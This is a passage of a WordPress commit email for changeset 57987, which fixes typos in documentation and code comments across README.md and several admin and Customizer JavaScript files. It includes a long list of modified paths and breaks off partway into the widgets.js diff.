<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>[57987] trunk: Docs: Fix various typos and spelling mistakes.</title>
</head>
<body>
<style type="text/css"><!--
#msg dl.meta { border: 1px #006 solid; background: #369; padding: 6px; color: #fff; }
#msg dl.meta dt { float: left; width: 6em; font-weight: bold; }
#msg dt:after { content:':';}
#msg dl, #msg dt, #msg ul, #msg li, #header, #footer, #logmsg { font-family: verdana,arial,helvetica,sans-serif; font-size: 10pt; }
#msg dl a { font-weight: bold}
#msg dl a:link { color:#fc3; }
#msg dl a:active { color:#ff0; }
#msg dl a:visited { color:#cc6; }
h3 { font-family: verdana,arial,helvetica,sans-serif; font-size: 10pt; font-weight: bold; }
#msg pre { white-space: pre-line; overflow: auto; background: #ffc; border: 1px #fa0 solid; padding: 6px; }
#logmsg { background: #ffc; border: 1px #fa0 solid; padding: 1em 1em 0 1em; }
#logmsg p, #logmsg pre, #logmsg blockquote { margin: 0 0 1em 0; }
#logmsg p, #logmsg li, #logmsg dt, #logmsg dd { line-height: 14pt; }
#logmsg h1, #logmsg h2, #logmsg h3, #logmsg h4, #logmsg h5, #logmsg h6 { margin: .5em 0; }
#logmsg h1:first-child, #logmsg h2:first-child, #logmsg h3:first-child, #logmsg h4:first-child, #logmsg h5:first-child, #logmsg h6:first-child { margin-top: 0; }
#logmsg ul, #logmsg ol { padding: 0; list-style-position: inside; margin: 0 0 0 1em; }
#logmsg ul { text-indent: -1em; padding-left: 1em; }#logmsg ol { text-indent: -1.5em; padding-left: 1.5em; }
#logmsg > ul, #logmsg > ol { margin: 0 0 1em 0; }
#logmsg pre { background: #eee; padding: 1em; }
#logmsg blockquote { border: 1px solid #fa0; border-left-width: 10px; padding: 1em 1em 0 1em; background: white;}
#logmsg dl { margin: 0; }
#logmsg dt { font-weight: bold; }
#logmsg dd { margin: 0; padding: 0 0 0.5em 0; }
#logmsg dd:before { content:'\00bb';}
#logmsg table { border-spacing: 0px; border-collapse: collapse; border-top: 4px solid #fa0; border-bottom: 1px solid #fa0; background: #fff; }
#logmsg table th { text-align: left; font-weight: normal; padding: 0.2em 0.5em; border-top: 1px dotted #fa0; }
#logmsg table td { text-align: right; border-top: 1px dotted #fa0; padding: 0.2em 0.5em; }
#logmsg table thead th { text-align: center; border-bottom: 1px solid #fa0; }
#logmsg table th.Corner { text-align: left; }
#logmsg hr { border: none 0; border-top: 2px dashed #fa0; height: 1px; }
#header, #footer { color: #fff; background: #636; border: 1px #300 solid; padding: 6px; }
#patch { width: 100%; }
#patch h4 {font-family: verdana,arial,helvetica,sans-serif;font-size:10pt;padding:8px;background:#369;color:#fff;margin:0;}
#patch .propset h4, #patch .binary h4 {margin:0;}
#patch pre {padding:0;line-height:1.2em;margin:0;}
#patch .diff {width:100%;background:#eee;padding: 0 0 10px 0;overflow:auto;}
#patch .propset .diff, #patch .binary .diff {padding:10px 0;}
#patch span {display:block;padding:0 10px;}
#patch .modfile, #patch .addfile, #patch .delfile, #patch .propset, #patch .binary, #patch .copfile {border:1px solid #ccc;margin:10px 0;}
#patch ins {background:#dfd;text-decoration:none;display:block;padding:0 10px;}
#patch del {background:#fdd;text-decoration:none;display:block;padding:0 10px;}
#patch .lines, .info {color:#888;background:#fff;}
--></style>
<div id="msg">
<dl class="meta" style="font-size: 105%">
<dt style="float: left; width: 6em; font-weight: bold">Revision</dt> <dd><a style="font-weight: bold" href="https://core.trac.wordpress.org/changeset/57987">57987</a><script type="application/ld+json">{"@context":"http://schema.org","@type":"EmailMessage","description":"Review this Commit","action":{"@type":"ViewAction","url":"https://core.trac.wordpress.org/changeset/57987","name":"Review Commit"}}</script></dd>
<dt style="float: left; width: 6em; font-weight: bold">Author</dt> <dd>swissspidy</dd>
<dt style="float: left; width: 6em; font-weight: bold">Date</dt> <dd>2024-04-12 17:45:23 +0000 (Fri, 12 Apr 2024)</dd>
</dl>
<pre style='padding-left: 1em; margin: 2em 0; border-left: 2px solid #ccc; line-height: 1.25; font-size: 105%; font-family: sans-serif'>Docs: Fix various typos and spelling mistakes.
Props swissspidy, jucaduca, sergeybiryukov.
See <a href="https://core.trac.wordpress.org/ticket/60699">#60699</a>.</pre>
<h3>Modified Paths</h3>
<ul>
<li><a href="#trunkREADMEmd">trunk/README.md</a></li>
<li><a href="#trunksrcjs_enqueueslibadminbarjs">trunk/src/js/_enqueues/lib/admin-bar.js</a></li>
<li><a href="#trunksrcjs_enqueueswpbackbonejs">trunk/src/js/_enqueues/wp/backbone.js</a></li>
<li><a href="#trunksrcjs_enqueueswpcustomizecontrolsjs">trunk/src/js/_enqueues/wp/customize/controls.js</a></li>
<li><a href="#trunksrcjs_enqueueswpcustomizeloaderjs">trunk/src/js/_enqueues/wp/customize/loader.js</a></li>
<li><a href="#trunksrcjs_enqueueswpcustomizeselectiverefreshjs">trunk/src/js/_enqueues/wp/customize/selective-refresh.js</a></li>
<li><a href="#trunksrcjs_enqueueswpcustomizewidgetsjs">trunk/src/js/_enqueues/wp/customize/widgets.js</a></li>
<li><a href="#trunksrcjs_enqueueswpdashboardjs">trunk/src/js/_enqueues/wp/dashboard.js</a></li>
<li><a href="#trunksrcjs_enqueueswpeditorbasejs">trunk/src/js/_enqueues/wp/editor/base.js</a></li>
<li><a href="#trunksrcjs_enqueueswpeditordfwjs">trunk/src/js/_enqueues/wp/editor/dfw.js</a></li>
<li><a href="#trunksrcjs_enqueueswpthemeplugineditorjs">trunk/src/js/_enqueues/wp/theme-plugin-editor.js</a></li>
<li><a href="#trunksrcjs_enqueueswpthemejs">trunk/src/js/_enqueues/wp/theme.js</a></li>
<li><a href="#trunksrcjsmediaviewstoolbarjs">trunk/src/js/media/views/toolbar.js</a></li>
<li><a href="#trunksrcwpadmincsslisttablescss">trunk/src/wp-admin/css/list-tables.css</a></li>
<li><a href="#trunksrcwpcontentthemestwentyfourteenincfeaturedcontentphp">trunk/src/wp-content/themes/twentyfourteen/inc/featured-content.php</a></li>
<li><a href="#trunksrcwpcontentthemestwentyseventeenassetscsscolorsdarkcss">trunk/src/wp-content/themes/twentyseventeen/assets/css/colors-dark.css</a></li>
<li><a href="#trunksrcwpcontentthemestwentytwelveincblockpatternsphp">trunk/src/wp-content/themes/twentytwelve/inc/block-patterns.php</a></li>
<li><a href="#trunksrcwpcontentthemestwentytwentyassetsjsindexjs">trunk/src/wp-content/themes/twentytwenty/assets/js/index.js</a></li>
<li><a href="#trunksrcwpcontentthemestwentytwentyoneassetssass06componentsheaderscss">trunk/src/wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss</a></li>
<li><a href="#trunksrcwpincludesclasswpthemejsonphp">trunk/src/wp-includes/class-wp-theme-json.php</a></li>
<li><a href="#trunksrcwpincludesembedphp">trunk/src/wp-includes/embed.php</a></li>
<li><a href="#trunksrcwpincludesfunctionsphp">trunk/src/wp-includes/functions.php</a></li>
<li><a href="#trunksrcwpincludeshtmlapiclasswphtmltagprocessorphp">trunk/src/wp-includes/html-api/class-wp-html-tag-processor.php</a></li>
<li><a href="#trunksrcwpincludesmsdeprecatedphp">trunk/src/wp-includes/ms-deprecated.php</a></li>
<li><a href="#trunksrcwpincludesnavmenutemplatephp">trunk/src/wp-includes/nav-menu-template.php</a></li>
<li><a href="#trunksrcwpincludespostphp">trunk/src/wp-includes/post.php</a></li>
<li><a href="#trunksrcwpincludesthemephp">trunk/src/wp-includes/theme.php</a></li>
<li><a href="#trunktestsphpunitdataformattingxssAttacksxml">trunk/tests/phpunit/data/formatting/xssAttacks.xml</a></li>
<li><a href="#trunktestsphpunitincludesabstracttestcasephp">trunk/tests/phpunit/includes/abstract-testcase.php</a></li>
<li><a href="#trunktestsphpunitincludesfactoryclasswpunittestfactoryforthingphp">trunk/tests/phpunit/includes/factory/class-wp-unittest-factory-for-thing.php</a></li>
<li><a href="#trunktestsphpunitincludesnormalizexmlxsl">trunk/tests/phpunit/includes/normalize-xml.xsl</a></li>
<li><a href="#trunktestsphpunitincludestestcaseajaxphp">trunk/tests/phpunit/includes/testcase-ajax.php</a></li>
<li><a href="#trunktestsphpunittestsactionsphp">trunk/tests/phpunit/tests/actions.php</a></li>
<li><a href="#trunktestsphpunittestsajaxwpAjaxParseMediaShortcodephp">trunk/tests/phpunit/tests/ajax/wpAjaxParseMediaShortcode.php</a></li>
<li><a href="#trunktestsphpunittestsajaxwpAjaxResponsephp">trunk/tests/phpunit/tests/ajax/wpAjaxResponse.php</a></li>
<li><a href="#trunktestsphpunittestsauthphp">trunk/tests/phpunit/tests/auth.php</a></li>
<li><a href="#trunktestsphpunittestsblocksregisterphp">trunk/tests/phpunit/tests/blocks/register.php</a></li>
<li><a href="#trunktestsphpunittestsblockssupportedStylesphp">trunk/tests/phpunit/tests/blocks/supportedStyles.php</a></li>
<li><a href="#trunktestsphpunittestsblockswpBlockTypephp">trunk/tests/phpunit/tests/blocks/wpBlockType.php</a></li>
<li><a href="#trunktestsphpunittestscachephp">trunk/tests/phpunit/tests/cache.php</a></li>
<li><a href="#trunktestsphpunittestscommentgetPageOfCommentphp">trunk/tests/phpunit/tests/comment/getPageOfComment.php</a></li>
<li><a href="#trunktestsphpunittestscronphp">trunk/tests/phpunit/tests/cron.php</a></li>
<li><a href="#trunktestsphpunittestsdbdbDeltaphp">trunk/tests/phpunit/tests/db/dbDelta.php</a></li>
<li><a href="#trunktestsphpunittestsdbphp">trunk/tests/phpunit/tests/db.php</a></li>
<li><a href="#trunktestsphpunittestsdependenciesstylesphp">trunk/tests/phpunit/tests/dependencies/styles.php</a></li>
<li><a href="#trunktestsphpunittestsfiltersphp">trunk/tests/phpunit/tests/filters.php</a></li>
<li><a href="#trunktestsphpunittestsfontsfontlibrarywpRestFontFamiliesControllerphp">trunk/tests/phpunit/tests/fonts/font-library/wpRestFontFamiliesController.php</a></li>
<li><a href="#trunktestsphpunittestsformattingcleanPrephp">trunk/tests/phpunit/tests/formatting/cleanPre.php</a></li>
<li><a href="#trunktestsphpunittestsformattingconvertSmiliesphp">trunk/tests/phpunit/tests/formatting/convertSmilies.php</a></li>
<li><a href="#trunktestsphpunittestsformattingemojiphp">trunk/tests/phpunit/tests/formatting/emoji.php</a></li>
<li><a href="#trunktestsphpunittestsformattingescUrlphp">trunk/tests/phpunit/tests/formatting/escUrl.php</a></li>
<li><a href="#trunktestsphpunittestsformattingmakeClickablephp">trunk/tests/phpunit/tests/formatting/makeClickable.php</a></li>
<li><a href="#trunktestsphpunittestsformattingsanitizeTextFieldphp">trunk/tests/phpunit/tests/formatting/sanitizeTextField.php</a></li>
<li><a href="#trunktestsphpunittestsformattingwpAutopphp">trunk/tests/phpunit/tests/formatting/wpAutop.php</a></li>
<li><a href="#trunktestsphpunittestsfunctionscleanDirsizeCachephp">trunk/tests/phpunit/tests/functions/cleanDirsizeCache.php</a></li>
<li><a href="#trunktestsphpunittestsfunctionswpMysqlWeekphp">trunk/tests/phpunit/tests/functions/wpMysqlWeek.php</a></li>
<li><a href="#trunktestsphpunittestsfunctionsphp">trunk/tests/phpunit/tests/functions.php</a></li>
<li><a href="#trunktestsphpunittestshttphttpphp">trunk/tests/phpunit/tests/http/http.php</a></li>
<li><a href="#trunktestsphpunittestsimageheaderphp">trunk/tests/phpunit/tests/image/header.php</a></li>
<li><a href="#trunktestsphpunittestsimageintermediateSizephp">trunk/tests/phpunit/tests/image/intermediateSize.php</a></li>
<li><a href="#trunktestsphpunittestsimagemetaphp">trunk/tests/phpunit/tests/image/meta.php</a></li>
<li><a href="#trunktestsphpunittestsinteractivityapiwpInteractivityAPIphp">trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPI.php</a></li>
<li><a href="#trunktestsphpunittestsinteractivityapiwpInteractivityAPIDirectivesProcessorphp">trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIDirectivesProcessor.php</a></li>
<li><a href="#trunktestsphpunittestsinteractivityapiwpInteractivityAPIFunctionsphp">trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIFunctions.php</a></li>
<li><a href="#trunktestsphpunittestsksesphp">trunk/tests/phpunit/tests/kses.php</a></li>
<li><a href="#trunktestsphpunittestslinkthemeFilephp">trunk/tests/phpunit/tests/link/themeFile.php</a></li>
<li><a href="#trunktestsphpunittestsmediaphp">trunk/tests/phpunit/tests/media.php</a></li>
<li><a href="#trunktestsphpunittestsmenuwpAjaxMenuQuickSearchphp">trunk/tests/phpunit/tests/menu/wpAjaxMenuQuickSearch.php</a></li>
<li><a href="#trunktestsphpunittestsmetadeleteMetadataphp">trunk/tests/phpunit/tests/meta/deleteMetadata.php</a></li>
<li><a href="#trunktestsphpunittestsmultisiteavoidBlogPagePermalinkCollisionphp">trunk/tests/phpunit/tests/multisite/avoidBlogPagePermalinkCollision.php</a></li>
<li><a href="#trunktestsphpunittestsmultisitesitephp">trunk/tests/phpunit/tests/multisite/site.php</a></li>
<li><a href="#trunktestsphpunittestsmultisiteupdateBlogStatusphp">trunk/tests/phpunit/tests/multisite/updateBlogStatus.php</a></li>
<li><a href="#trunktestsphpunittestsoembedfilterResultphp">trunk/tests/phpunit/tests/oembed/filterResult.php</a></li>
<li><a href="#trunktestsphpunittestspostgetPageUriphp">trunk/tests/phpunit/tests/post/getPageUri.php</a></li>
<li><a href="#trunktestsphpunittestspostgetPostTypeLabelsphp">trunk/tests/phpunit/tests/post/getPostTypeLabels.php</a></li>
<li><a href="#trunktestsphpunittestspostisPostStatusViewablephp">trunk/tests/phpunit/tests/post/isPostStatusViewable.php</a></li>
<li><a href="#trunktestsphpunittestspostmetaRevisionsphp">trunk/tests/phpunit/tests/post/metaRevisions.php</a></li>
<li><a href="#trunktestsphpunittestspostnavmenuphp">trunk/tests/phpunit/tests/post/nav-menu.php</a></li>
<li><a href="#trunktestsphpunittestspostobjectsphp">trunk/tests/phpunit/tests/post/objects.php</a></li>
<li><a href="#trunktestsphpunittestspostqueryphp">trunk/tests/phpunit/tests/post/query.php</a></li>
<li><a href="#trunktestsphpunittestsposttypesphp">trunk/tests/phpunit/tests/post/types.php</a></li>
<li><a href="#trunktestsphpunittestspostwpAfterInsertPostphp">trunk/tests/phpunit/tests/post/wpAfterInsertPost.php</a></li>
<li><a href="#trunktestsphpunittestsprivacywpPrivacyGeneratePersonalDataExportFilephp">trunk/tests/phpunit/tests/privacy/wpPrivacyGeneratePersonalDataExportFile.php</a></li>
<li><a href="#trunktestsphpunittestsqueryinvalidQueriesphp">trunk/tests/phpunit/tests/query/invalidQueries.php</a></li>
<li><a href="#trunktestsphpunittestsquerysearchphp">trunk/tests/phpunit/tests/query/search.php</a></li>
<li><a href="#trunktestsphpunittestsrestapirestapplicationpasswordscontrollerphp">trunk/tests/phpunit/tests/rest-api/rest-application-passwords-controller.php</a></li>
<li><a href="#trunktestsphpunittestsrestapirestglobalstylesrevisionscontrollerphp">trunk/tests/phpunit/tests/rest-api/rest-global-styles-revisions-controller.php</a></li>
<li><a href="#trunktestsphpunittestsrestapirestrevisionscontrollerphp">trunk/tests/phpunit/tests/rest-api/rest-revisions-controller.php</a></li>
<li><a href="#trunktestsphpunittestsrestapirestserverphp">trunk/tests/phpunit/tests/rest-api/rest-server.php</a></li>
<li><a href="#trunktestsphpunittestsrestapirestthemescontrollerphp">trunk/tests/phpunit/tests/rest-api/rest-themes-controller.php</a></li>
<li><a href="#trunktestsphpunittestsscriptmoduleswpScriptModulesphp">trunk/tests/phpunit/tests/script-modules/wpScriptModules.php</a></li>
<li><a href="#trunktestsphpunittestssitemapssitemapsphp">trunk/tests/phpunit/tests/sitemaps/sitemaps.php</a></li>
<li><a href="#trunktestsphpunitteststermcachephp">trunk/tests/phpunit/tests/term/cache.php</a></li>
<li><a href="#trunktestsphpunitteststhemewpThemeJsonphp">trunk/tests/phpunit/tests/theme/wpThemeJson.php</a></li>
<li><a href="#trunktestsphpunitteststhemephp">trunk/tests/phpunit/tests/theme.php</a></li>
<li><a href="#trunktestsphpunittestsusercapabilitiesphp">trunk/tests/phpunit/tests/user/capabilities.php</a></li>
<li><a href="#trunktestsphpunittestsusermapMetaCapphp">trunk/tests/phpunit/tests/user/mapMetaCap.php</a></li>
<li><a href="#trunktestsphpunittestsuserwpGetUsersWithNoRolephp">trunk/tests/phpunit/tests/user/wpGetUsersWithNoRole.php</a></li>
<li><a href="#trunktestsphpunittestsuserphp">trunk/tests/phpunit/tests/user.php</a></li>
<li><a href="#trunktestsphpunittestswidgetswpWidgetMediaImagephp">trunk/tests/phpunit/tests/widgets/wpWidgetMediaImage.php</a></li>
<li><a href="#trunktestsphpunittestsxmlrpcwpnewCommentphp">trunk/tests/phpunit/tests/xmlrpc/wp/newComment.php</a></li>
<li><a href="#trunktestsphpunittestsxmlrpcwpnewPostphp">trunk/tests/phpunit/tests/xmlrpc/wp/newPost.php</a></li>
<li><a href="#trunktestsqunitwpadminjscustomizecontrolsjs">trunk/tests/qunit/wp-admin/js/customize-controls.js</a></li>
<li><a href="#trunktestsqunitwpadminjsupdatesjs">trunk/tests/qunit/wp-admin/js/updates.js</a></li>
</ul>
<h3>Property Changed</h3>
<ul>
<li><a href="#trunkgithub">trunk/.github/</a></li>
<li><a href="#trunkgithubworkflows">trunk/.github/workflows/</a></li>
</ul>
</div>
<div id="patch">
<h3>Diff</h3>
<span class="cx" style="display: block; padding: 0 10px">Index: trunk/.github
</span><span class="cx" style="display: block; padding: 0 10px">===================================================================
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">--- trunk/.github 2024-04-12 12:15:58 UTC (rev 57986)
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+++ trunk/.github 2024-04-12 17:45:23 UTC (rev 57987)
</ins><a id="trunkgithub"></a>
<div class="propset"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Property changes: trunk/.github</h4>
<pre class="diff"><span>
</span></pre></div>
<a id="svnignore"></a>
<div class="addfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Added: svn:ignore</h4></div>
<ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+typos.toml
</ins><span class="cx" style="display: block; padding: 0 10px">Index: trunk/.github/workflows
</span><span class="cx" style="display: block; padding: 0 10px">===================================================================
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">--- trunk/.github/workflows 2024-04-12 12:15:58 UTC (rev 57986)
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+++ trunk/.github/workflows 2024-04-12 17:45:23 UTC (rev 57987)
</ins><a id="trunkgithubworkflows"></a>
<div class="propset"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Property changes: trunk/.github/workflows</h4>
<pre class="diff"><span>
</span></pre></div>
<a id="svnignore"></a>
<div class="addfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Added: svn:ignore</h4></div>
<ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+spell-check.yml
</ins><a id="trunkREADMEmd"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/README.md</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/README.md 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/README.md 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -13,7 +13,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> [](https://github.com/codespaces/new?hide_repo_select=true&ref=trunk&repo=75645659)
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-A codespace will open in a web-based version of Visual Studio Code. The [dev container](.devcontainer/devcontainer.json) is fully configured with softwares needed for this project.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+A codespace will open in a web-based version of Visual Studio Code. The [dev container](.devcontainer/devcontainer.json) is fully configured with software needed for this project.
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> **Note**: Dev containers is an open spec which is supported by [GitHub Codespaces](https://github.com/codespaces) and [other tools](https://containers.dev/supporting).
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunksrcjs_enqueueslibadminbarjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/lib/admin-bar.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/lib/admin-bar.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/lib/admin-bar.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -203,7 +203,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Toogle hover class for mobile devices.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Toggle hover class for mobile devices.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 5.3.1
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpbackbonejs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/backbone.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/backbone.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/backbone.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -310,7 +310,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 3.6.0
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @param {Object} options Options for call.
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @param {boolean} options.silent If true, `unset` wil *not* be triggered on
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @param {boolean} options.silent If true, `unset` will *not* be triggered on
</ins><span class="cx" style="display: block; padding: 0 10px"> * the master views' parent.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @return {wp.Backbone.Subviews} The current Subviews instance.
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpcustomizecontrolsjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/customize/controls.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/customize/controls.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/customize/controls.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1799,7 +1799,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> section.closeDetails();
</span><span class="cx" style="display: block; padding: 0 10px"> } else {
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Escape from the inifinite scroll list.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Escape from the infinite scroll list.
</ins><span class="cx" style="display: block; padding: 0 10px"> section.headerContainer.find( '.customize-themes-section-title' ).focus();
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> event.stopPropagation(); // Prevent section from being collapsed.
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -7199,7 +7199,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> } ) );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Return whether the pubish settings section should be active.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Return whether the publish settings section should be active.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @return {boolean} Is section active.
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpcustomizeloaderjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/customize/loader.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/customize/loader.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/customize/loader.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -22,7 +22,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> });
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Allows the Customizer to be overlayed on any page.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Allows the Customizer to be overlaid on any page.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * By default, any element in the body with the load-customize class will open
</span><span class="cx" style="display: block; padding: 0 10px"> * an iframe overlay with the URL specified.
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpcustomizeselectiverefreshjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/customize/selective-refresh.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/customize/selective-refresh.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/customize/selective-refresh.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -429,7 +429,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /* jshint ignore:start */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- self.orginalDocumentWrite = document.write;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ self.originalDocumentWrite = document.write;
</ins><span class="cx" style="display: block; padding: 0 10px"> document.write = function() {
</span><span class="cx" style="display: block; padding: 0 10px"> throw new Error( self.data.l10n.badDocumentWrite );
</span><span class="cx" style="display: block; padding: 0 10px"> };
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -473,8 +473,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> partial.fallback( error, [ placement ] );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> /* jshint ignore:start */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- document.write = self.orginalDocumentWrite;
- self.orginalDocumentWrite = null;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ document.write = self.originalDocumentWrite;
+ self.originalDocumentWrite = null;
</ins><span class="cx" style="display: block; padding: 0 10px"> /* jshint ignore:end */
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> partial.createEditShortcutForPlacement( placement );
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -673,7 +673,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> self._pendingPartialRequests = {};
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Timeout ID for the current requesr, or null if no request is current.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Timeout ID for the current request, or null if no request is current.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 4.5.0
</span><span class="cx" style="display: block; padding: 0 10px"> * @type {number|null}
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpcustomizewidgetsjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/customize/widgets.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/customize/widgets.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/customize/widgets.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -388,7 +388,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> },
